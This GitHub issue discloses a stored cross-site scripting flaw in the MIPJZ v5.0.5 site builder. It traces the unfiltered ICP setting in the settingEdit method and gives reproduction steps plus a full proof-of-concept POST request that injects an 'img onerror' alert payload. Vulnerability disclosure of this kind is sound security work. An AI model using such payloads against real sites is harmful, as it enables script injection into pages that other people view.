Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

There is a storage type cross site script in MIPJZ v5.0.5 #16

Open
LvZCh opened this issue Sep 19, 2024 · 1 comment
Open

There is a storage type cross site script in MIPJZ v5.0.5 #16

LvZCh opened this issue Sep 19, 2024 · 1 comment

Comments

@LvZCh
Copy link

LvZCh commented Sep 19, 2024

Vulnerability product: mipjz
Vulnerability version: 5.0.5
Source code link: https://github.com/sansanyun/mipjz/archive/refs/heads/master.zip
Vulnerability type: Storage XSS
Vulnerability details:
In the settingEdit method of the mipjz\app\setting\controller\ApiAdminSetting.php file, all passed values are assigned to $settingInfo, and the value of the ICP parameter is not filtered.
Vulnerability location:mipjz\app\setting\controller\ApiAdminSetting.php#settingEdit method
image

Vulnerability reproduction:
Background administrator rights
Open: http://192.168.0.105:82/index.php?s=/admin/#/setting/setting/
Insert<img src oneror=alert (1)> in the ICP filing number and click save now.
image
Open again: http://192.168.0.105:82
pop-up notification
image
POC:

POST /index.php?s=/setting/ApiAdminSetting/settingEdit HTTP/1.1
Host: mipjz.com:82
Content-Length: 1904
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
dataId: 
Content-Type: application/json;charset=UTF-8
Origin: http://mipjz.com:82
Referer: http://mipjz.com:82/index.php?s=/admin/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=84a79679dc650a2da1270dfa0aed683d; 
Connection: close

{"setting":"{\"siteName\":\"MIP建站系统\",\"keywords\":\"\",\"description\":\"\",\"template\":\"default\",\"domain\":\"\",\"uploadPath\":\"\",\"uploadUrl\":\"uploads\",\"statistical\":\"\",\"icp\":\"<img src onerror=alert(1)>\",\"systemStatus\":true,\"systemType\":\"cms\",\"idStatus\":false,\"mipDomain\":\"\",\"articleModelName\":\"文章\",\"loginStatus\":true,\"registerStatus\":false,\"articleModelUrl\":\"article\",\"askModelName\":\"问答\",\"askModelUrl\":\"ask\",\"userModelName\":\"用户\",\"userModelUrl\":\"user\",\"codeCompression\":false,\"indexTitle\":\"\",\"baiduSpider\":true,\"baiduMip\":\"1\",\"localCurrentVersionNum\":\"500\",\"localCurrentVersion\":\"v5.0.0\",\"titleSeparator\":\"_\",\"pcStatistical\":\"\",\"httpType\":\"http://\",\"mipApiAddress\":\"\",\"articlePages\":false,\"tagModelName\":\"标签\",\"tagModelUrl\":\"tag\",\"loginCaptcha\":true,\"registerCaptcha\":\"1\",\"biaduZn\":\"12775452642328057043\",\"articleStatus\":\"1\",\"askStatus\":\"\",\"aritcleLevelRemove\":false,\"askLevelRemove\":\"\",\"articleDomain\":\"\",\"askDomain\":\"\",\"superSites\":false,\"rewrite\":false,\"topDomain\":\"\",\"superTpl\":false,\"diyUrlStatus\":false,\"urlApiAddress\":null,\"mipPostStatus\":false,\"mipTemplate\":\"default\",\"articlePagesNum\":\"1000\",\"urlPageBreak\":\"_\",\"urlCategory\":false,\"baiduSearchPcUrl\":\"/baiduSitemapPc.xml\",\"baiduSearchMUrl\":\"http:///baiduSitemapMobile.xml\",\"baiduYuanChuangUrl\":\"\",\"baiduTimePcUrl\":\"\",\"baiduTimeMUrl\":null,\"publishTime\":null,\"baiduYuanChuangStatus\":false,\"baiduTimePcStatus\":false,\"baiduTimeMStatus\":false,\"guanfanghaoStatus\":false,\"guanfanghaoUrl\":\"\",\"guanfanghaoStatusPost\":false,\"guanfanghaoCambrian\":\"<mip-cambrian site-id=\\\"官方号ID\\\"></mip-cambrian>\\n\",\"guanfanghaoRealtimeUrl\":\"\",\"topStatus\":null,\"productModelUrl\":\"product\",\"productModelName\":\"产品\"}"}

image
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@LvZCh and others